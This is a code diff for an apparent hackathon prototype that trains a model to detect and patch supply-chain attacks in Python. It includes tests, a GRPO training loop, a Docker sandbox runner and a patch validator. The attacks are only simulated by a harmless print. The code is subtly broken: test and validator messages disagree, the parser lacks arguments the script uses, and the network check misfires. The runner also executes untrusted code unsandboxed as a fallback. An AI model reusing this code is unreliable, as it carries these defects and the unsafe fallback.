165
+
166
+ # Check max steps
167
+ if self.step_counter >= self.max_steps and not done:
168
+ reward -= 0.5 # Penalty for timeout
169
+ done = True
170
+
171
+ self.last_reward = reward
172
+ return self._get_obs(), reward, done, False, info
173
+
174
+ def render(self):
175
+ print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")
sentinel_synth/tests/__init__.py ADDED
File without changes
sentinel_synth/tests/test_validator.py ADDED
@@ -0,0 +1,57 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import pytest
2
+ from sentinel_synth.validation.patch_validator import validate_patch
3
+
4
+ def test_syntax_error_detected():
5
+ scenario = {"type": "functional", "code_snippet": "print('hello')", "unit_test_code": None}
6
+ patch = "print('hello" # Missing closing quote
7
+
8
+ success, msg, details = validate_patch(scenario, patch, use_docker=False)
9
+
10
+ assert success is False
11
+ assert msg == "Syntax error"
12
+ assert "error" in details
13
+
14
+ def test_unit_test_pass():
15
+ scenario = {
16
+ "type": "functional",
17
+ "code_snippet": "def add(a, b): return a + b",
18
+ "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
19
+ }
20
+ patch = "def add(a, b):\n return a + b\n"
21
+
22
+ success, msg, details = validate_patch(scenario, patch, use_docker=False)
23
+
24
+ assert success is True
25
+ assert msg == "Patch is valid"
26
+
27
+ def test_unit_test_fail():
28
+ scenario = {
29
+ "type": "functional",
30
+ "code_snippet": "def add(a, b): return a + b",
31
+ "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
32
+ }
33
+ # Breaking the functionality in the patch
34
+ patch = "def add(a, b):\n return a - b\n"
35
+
36
+ success, msg, details = validate_patch(scenario, patch, use_docker=False)
37
+
38
+ assert success is False
39
+ assert msg == "Unit test failed"
40
+ assert "test_output" in details
41
+
42
+ def test_vulnerability_remains():
43
+ # Attack injects a hidden print which simulates a backdoor
44
+ scenario = {
45
+ "type": "true_positive",
46
+ "attack_type": "obfuscated_exec",
47
+ "code_snippet": "print('Hello from hidden exec!')\ndef add(a, b): return a + b",
48
+ "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
49
+ }
50
+ # Patch fails to remove the backdoor, only formats the code
51
+ patch = "print('Hello from hidden exec!')\ndef add(a, b):\n return a + b\n"
52
+
53
+ success, msg, details = validate_patch(scenario, patch, use_docker=False)
54
+
55
+ assert success is False
56
+ assert msg == "Vulnerability remains"
57
+ assert "evidence" in details
sentinel_synth/training/__init__.py ADDED
File without changes
sentinel_synth/training/train_grpo.py ADDED
@@ -0,0 +1,187 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import argparse
3
+ import numpy as np
4
+
5
+ try:
6
+ import wandb
7
+ except ImportError:
8
+ wandb = None
9
+
10
+ # In a real environment, we would also import:
11
+ # from unsloth import FastLanguageModel
12
+ # from trl import GRPOTrainer, GRPOConfig
13
+ # But for the hackathon prototype and safe execution without massive deps,
14
+ # we use mock classes in dry-run mode if the real ones aren't available.
15
+
16
+ from ..envs.sentinel_env import SentinelEnv
17
+
18
+ def train_agent(args):
19
+ """
20
+ Main training loop for Sentinel-Synth GRPO.
21
+ """
22
+ # 1. Setup WandB
23
+ if not args.dry_run:
24
+ wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))
25
+ else:
26
+ print("[DRY RUN] WandB initialization skipped.")
27
+
28
+ # 2. Load Environment
29
+ env = SentinelEnv(use_docker=args.use_docker)
30
+ print(f"Loaded environment with {len(env.scenarios)} scenarios.")
31
+
32
+ # 3. Load Model (Mock or unsloth)
33
+ if args.dry_run:
34
+ print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")
35
+ def dummy_policy(obs):
36
+ # Deterministic dummy policy for dry runs
37
+ risk = obs["risk_score"][0]
38
+ if risk > 0.5:
39
+ return 3 # ACTION_SUBMIT_PATCH
40
+ return 0 # ACTION_ANALYZE
41
+
42
+ # 4. Dummy Training Loop
43
+ epochs = 3
44
+ batch_size = 4
45
+
46
+ for epoch in range(epochs):
47
+ print(f"--- Epoch {epoch+1}/{epochs} ---")
48
+ total_rewards = []
49
+
50
+ for batch_idx in range(len(env.scenarios) // batch_size):
51
+ trajectories = []
52
+ for g in range(args.group_size):
53
+ obs, _ = env.reset()
54
+ done = False
55
+ trajectory_reward = 0
56
+ steps = 0
57
+
58
+ while not done and steps < env.max_steps:
59
+ action = dummy_policy(obs)
60
+ obs, reward, done, _, info = env.step(action)
61
+ trajectory_reward += reward
62
+ steps += 1
63
+
64
+ trajectories.append(trajectory_reward)
65
+
66
+ # Mock GRPO Advantage calculation
67
+ mean_reward = np.mean(trajectories)
68
+ std_reward = np.std(trajectories) + 1e-8
69
+ advantages = [(r - mean_reward) / std_reward for r in trajectories]
70
+
71
+ total_rewards.append(mean_reward)
72
+ print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")
73
+
74
+ print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")
75
+ if not args.dry_run:
76
+ wandb.log({"epoch": epoch+1, "mean_reward": np.mean(total_rewards)})
77
+
78
+ print("[DRY RUN] Training complete. Saved dummy adapter to ./grpo_lora/")
79
+ else:
80
+ print("Initializing true GRPO training with trl and unsloth...")
81
+ try:
82
+ from unsloth import FastLanguageModel
83
+ from unsloth import is_bfloat16_supported
84
+ from trl import GRPOTrainer, GRPOConfig
85
+ from datasets import Dataset
86
+
87
+ max_seq_length = args.max_seq_len
88
+ model, tokenizer = FastLanguageModel.from_pretrained(
89
+ model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
90
+ max_seq_length=max_seq_length,
91
+ load_in_4bit=True,
92
+ )
93
+
94
+ model = FastLanguageModel.get_peft_model(
95
+ model,
96
+ r=16,
97
+ target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
98
+ "gate_proj", "up_proj", "down_proj"],
99
+ lora_alpha=16,
100
+ lora_dropout=0,
101
+ bias="none",
102
+ use_gradient_checkpointing="unsloth",
103
+ random_state=3407,
104
+ )
105
+
106
+ # Formulate training as text completion where PPO builds on top.
107
+ # In GRPO, we can provide a reward function that evaluates completions.
108
+
109
+ import re
110
+
111
+ def env_reward_function(completions, prompts, **kwargs):
112
+ """
113
+ Extracts chosen action, runs env, returns reward array.
114
+ Matches completions to their corresponding scenario from prompts.
115
+ """
116
+ rewards = []
117
+ for prompt, completion in zip(prompts, completions):
118
+ # extract the action from the completion using regex
119
+ text = completion[0]["content"]
120
+ match = re.search(r"<action>(\d+)</action>", text)
121
+ if match:
122
+ try:
123
+ action = int(match.group(1))
124
+ except ValueError:
125
+ action = SentinelEnv.ACTION_ANALYZE
126
+ else:
127
+ action = SentinelEnv.ACTION_ANALYZE
128
+
129
+ # Find which scenario this prompt belongs to
130
+ # (In a real setup we'd pass IDs, here we search by substring)
131
+ target_scenario = None
132
+ for s in env.scenarios:
133
+ if s["code_snippet"][:100] in prompt:
134
+ target_scenario = s
135
+ break
136
+
137
+ if not target_scenario:
138
+ rewards.append(0.0)
139
+ continue
140
+
141
+ # Reset env with this specific scenario
142
+ obs, info = env.reset(options={"scenario": target_scenario})
143
+ _, reward, _, _, _ = env.step(action)
144
+ rewards.append(reward)
145
+ return rewards
146
+
147
+ # We need a proper dataset of prompts
148
+ prompt_data = [{"prompt": f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."} for s in env.scenarios]
149
+ dataset = Dataset.from_list(prompt_data)
150
+
151
+ training_args = GRPOConfig(
152
+ output_dir="grpo_lora",
153
+ learning_rate=args.learning_rate,
154
+ per_device_train_batch_size=1,
155
+ gradient_accumulation_steps=args.gradient_accumulation_steps,
156
+ max_prompt_length=args.max_seq_len // 2,
157
+ max_completion_length=args.max_seq_len // 2,
158
+ num_generations=args.group_size,
159
+ max_steps=args.max_steps,
160
+ save_steps=50,
161
+ logging_steps=10,
162
+ report_to="wandb",
163
+ )
164
+
165
+ trainer = GRPOTrainer(
166
+ model=model,
167
+ reward_funcs=[env_reward_function],
168
+ args=training_args,
169
+ train_dataset=dataset,
170
+ )
171
+
172
+ trainer.train()
173
+ model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
174
+ print("Training complete and adapter saved.")
175
+ except ImportError as e:
176
+ print(f"Skipping standard training fallback. Missing required dependency: {e}")
177
+
178
+ if __name__ == "__main__":
179
+ parser = argparse.ArgumentParser()
180
+ parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
181
+ parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
182
+ parser.add_argument("--learning-rate", type=float, default=1e-6)
183
+ parser.add_argument("--group-size", type=int, default=4)
184
+ parser.add_argument("--max-seq-len", type=int, default=1024)
185
+
186
+ args = parser.parse_args()
187
+ train_agent(args)
sentinel_synth/validation/__init__.py ADDED
File without changes
sentinel_synth/validation/docker_runner.py ADDED
@@ -0,0 +1,107 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import tempfile
3
+ import subprocess
4
+ import shutil
5
+
6
+ # To support --no-docker or environments where docker isn't running yet.
7
+ def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
8
+ """
9
+ Executes Python code in an isolated environment.
10
+ If use_docker is True, runs in `sentinel-sandbox:latest`.
11
+ If False, runs locally using subprocess (UNSAFE for real workloads, but fine for demo/dev).
12
+ """
13
+ temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
14
+ script_path = os.path.join(temp_dir, "script.py")
15
+
16
+ with open(script_path, "w") as f:
17
+ f.write(code)
18
+
19
+ result = {
20
+ "stdout": "",
21
+ "stderr": "",
22
+ "exit_code": -1,
23
+ "network_blocked": use_docker,
24
+ "file_writes": []
25
+ }
26
+
27
+ try:
28
+ if use_docker:
29
+ # We assume docker CLI is available.
30
+ # `docker run --rm --network none --memory 256m --cpus 0.5 -v temp_dir:/app sentinel-sandbox python /app/script.py`
31
+ cmd = [
32
+ "docker", "run", "--rm",
33
+ "--network", "none",
34
+ "--memory", "256m",
35
+ "--cpus", "0.5",
36
+ "-v", f"{temp_dir}:/app",
37
+ "sentinel-sandbox:latest",
38
+ "python", "/app/script.py"
39
+ ]
40
+ else:
41
+ # Local fallback (UNSAFE but necessary if Docker is unavailable)
42
+ cmd = ["python3", script_path]
43
+
44
+ process = subprocess.run(
45
+ cmd,
46
+ capture_output=True,
47
+ text=True,
48
+ timeout=timeout_sec
49
+ )
50
+
51
+ result["stdout"] = process.stdout
52
+ result["stderr"] = process.stderr
53
+ result["exit_code"] = process.returncode
54
+
55
+ # Check if the code wrote any *new* files to the temp dir
56
+ for filename in os.listdir(temp_dir):
57
+ if filename != "script.py":
58
+ result["file_writes"].append(filename)
59
+
60
+ except subprocess.TimeoutExpired as e:
61
+ result["stderr"] = "Execution timed out."
62
+ if use_docker and hasattr(e, 'stdout') and e.stdout:
63
+ result["stdout"] = e.stdout.decode('utf-8', errors='ignore') if isinstance(e.stdout, bytes) else e.stdout
64
+
65
+ except Exception as e:
66
+ result["stderr"] = f"Execution error: {str(e)}"
67
+
68
+ finally:
69
+ shutil.rmtree(temp_dir, ignore_errors=True)
70
+
71
+ return result
72
+
73
+ def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
74
+ """Check python syntax of the code without fully executing it."""
75
+ temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
76
+ script_path = os.path.join(temp_dir, "script.py")
77
+
78
+ with open(script_path, "w") as f:
79
+ f.write(code)
80
+
81
+ try:
82
+ if use_docker:
83
+ cmd = [
84
+ "docker", "run", "--rm",
85
+ "-v", f"{temp_dir}:/app",
86
+ "sentinel-sandbox:latest",
87
+ "python", "-m", "py_compile", "/app/script.py"
88
+ ]
89
+ else:
90
+ cmd = ["python3", "-m", "py_compile", script_path]
91
+
92
+ process = subprocess.run(
93
+ cmd,
94
+ capture_output=True,
95
+ text=True,
96
+ timeout=5
97
+ )
98
+ if process.returncode == 0:
99
+ return True, ""
100
+ else:
101
+ return False, process.stderr
102
+ except subprocess.TimeoutExpired:
103
+ return False, "Syntax check timed out"
104
+ except Exception as e:
105
+ return False, f"Syntax check failed: {e}"
106
+ finally:
107
+ shutil.rmtree(temp_dir, ignore_errors=True)
sentinel_synth/validation/patch_validator.py ADDED
@@ -0,0 +1,87 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import tempfile
3
+ import textwrap
4
+ from .docker_runner import run_code, check_syntax
5
+
6
+ def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
7
+ """
8
+ Validates a patch using a 3-step pipeline:
9
+ 1. Syntax Check
10
+ 2. Unit Test Execution
11
+ 3. Re-attack (Vulnerability Verification)
12
+
13
+ Returns: (success, message, details_dict)
14
+ """
15
+ details = {}
16
+
17
+ # 1. Syntax Check
18
+ is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
19
+ if not is_valid:
20
+ details["error"] = err_msg
21
+ return False, "Syntax error", details
22
+
23
+ # 2. Unit Test Execution
24
+ if scenario.get("unit_test_code"):
25
+ # We need to run the unit test code.
26
+ # test.py contains something like: "import code; assert code.func() == expected"
27
+ # We write patched code to a module 'code.py', and run 'test.py'
28
+
29
+ # We can construct a combined script that writes the 'code' module dynamically,
30
+ # or we just embed the patched code and the test code in one unified runner.
31
+ # Easiest way in a single file runner (since docker_runner runs a single script):
32
+ combined_script = f"""import sys
33
+ import types
34
+
35
+ # Create a mock 'code' module
36
+ module = types.ModuleType('code')
37
+ exec('''{patch_code}''', module.__dict__)
38
+ sys.modules['code'] = module
39
+
40
+ # Run the unit test
41
+ {scenario['unit_test_code']}
42
+ print("TEST_SUCCESS")
43
+ """
44
+
45
+ result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
46
+ if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
47
+ details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
48
+ return False, "Unit test failed", details
49
+
50
+ # 3. Re-attack (Vulnerability Verification)
51
+ if scenario["type"] == "true_positive" and scenario.get("attack_type"):
52
+ # Run original code snippet to get baseline malicious behavior
53
+ attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)
54
+
55
+ # Run patched code
56
+ patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)
57
+
58
+ vulnerability_remains = False
59
+
60
+ # Generic heuristic: Did the patch reduce suspicious side-effects?
61
+ # 1. Compare file writes (malicious often creates/modifies files)
62
+ if len(patch_result.get("file_writes", [])) >= len(attack_result.get("file_writes", [])) and len(attack_result.get("file_writes", [])) > 0:
63
+ # Basic check: if attack result has file writes and patch still has them or more
64
+ vulnerability_remains = True
65
+
66
+ # 2. Compare network attempts (if telemetry includes it)
67
+ if patch_result.get("network_blocked") and attack_result.get("network_blocked"):
68
+ vulnerability_remains = True
69
+
70
+ # 3. Specific attack type checks (refined)
71
+ if scenario["attack_type"] == "typosquatting":
72
+ if "ImportError" in patch_result["stderr"] and "pythonn" in patch_result["stderr"]:
73
+ vulnerability_remains = True
74
+ elif scenario["attack_type"] == "obfuscated_exec":
75
+ # If the patch still produces the same specific output as the obfuscated one
76
+ if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
77
+ vulnerability_remains = True
78
+
79
+ if vulnerability_remains:
80
+ details["evidence"] = {
81
+ "attack_telemetry": attack_result,
82
+ "patch_telemetry": patch_result
83
+ }
84
+ return False, "Vulnerability still accessible", details
85
+
86
+ details["validation_log"] = "All checks passed successfully."
87
+ return True, "Patch is valid", details
setup.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from setuptools import setup, find_packages
2
+
3
+ setup(
4
+ name="sentinel_synth",
5
+ version="0.1.0",
6
+ packages=find_packages(),
7
+ install_requires=[
8
+ "gymnasium>=0.29.0",
9
+ "docker>=7.0.0",
10
+ "streamlit>=1.30.0",
11
+ "wandb>=0.16.0",
12
+ "pytest>=8.0.0",
13
+ "synthetic-data-kit>=0.1.0"
14
+ ]
15
+ )